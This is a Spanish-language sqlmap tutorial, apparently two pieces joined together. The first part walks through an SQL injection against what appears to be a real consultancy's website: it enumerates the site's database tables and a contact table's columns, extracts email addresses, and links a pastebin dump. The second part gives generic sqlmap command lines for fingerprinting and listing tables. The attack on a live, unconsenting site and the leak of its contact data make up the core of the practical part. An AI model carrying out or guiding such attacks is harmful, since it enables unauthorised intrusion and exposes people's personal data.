SQL Map
SQL Map
¿Qué es Sqlmap?
Sqlmap es una herramienta desarrollada en el lenguaje python y es muy util para hacer
inyeccciones sql automatizados.
Caracteristicas
Soporte completo para seis técnicas de inyección SQL: booleano basado ciegos,
ciegos basado en el tiempo, basado en errores, consulta UNION, las consultas
apilados y fuera de banda.
Apoya para conectarse directamente a la base de datos sin tener que pasar a través
de una inyección SQL, proporcionando credenciales del DBMS, dirección IP, el
puerto y el nombre de base de datos.
Bueno creo que con esta referencia es suficiente , ahora es el momento de la practica. En
esta ocasion voy a utilizar el Sqlmap que viene ya instalado en el Backtrack5R3. Pues
comenzemos...=)
~# cd Desktop
~# cd /pentest/database/sqlmap
~# python sqlmap.py
Por falta de tiempo solo voy a poder explicar los comandos básicos del Sqlmap, los demas
se los dejo a ustedes..xD.
http://www.chesleyconsulting.com/faq/faq.php?faq_id=15
Ahora vamos a pedir el numero de tablas que tiene la base de datos chesley_pompmo.
pommo_templates
pommo_updates
states
static_pages
tbl_x_contact_basic
Ahora vamos a pedir que nos muestre las columnas de la tabla tbl_x_contact_basic.
email_address
email_city
email_fname
email_lname
email_phone
Ahora vamos a pedir que nos muestre la data de las columna email_address.
Para terminar bien, hay que terminar de extraer la base de datos de esta web de seguridad
informática o eso parece..=)
http://pastebin.com/GQMAaUN4
Para los que desean usar esta herramienta en windows tienen que descargarse el paquete de
python y activarlo , asi podra correr libremente el Sqlmap. =) Bueno me despido y sera
hasta la próxima...Nos vemos...=)
SQLMap – Herramienta Automática de
Inyección SQL
sqlmap es una herramienta desarrollada en python para realizar inyección de código sql
automáticamente. Su objetivo es detectar y aprovechar las vulnerabilidades de inyección
SQL en aplicaciones web. Una vez que se detecta una o más inyecciones SQL en el host de
destino, el usuario puede elegir entre una variedad de opciones entre ellas, enumerar los
usuarios, los hashes de contraseñas, los privilegios, las bases de datos , O todo el volcado
de tablas / columnas específicas del DBMS , ejecutar su propio SQL SELECT, leer
archivos específicos en el sistema de archivos y mucho más.
Características
# ./sqlmap.py -u "http://XXXXXXXXXXX/detail.php?code=XXXXX" -b
sqlmap coded by Bernardo Damele A. G. <[email protected]>
and Daniele Bellucci <[email protected]>
Listar tablas
sqlmap --dbms=mysql -u "DIRECCIONURL" -D "BASEDEDATOS" --tables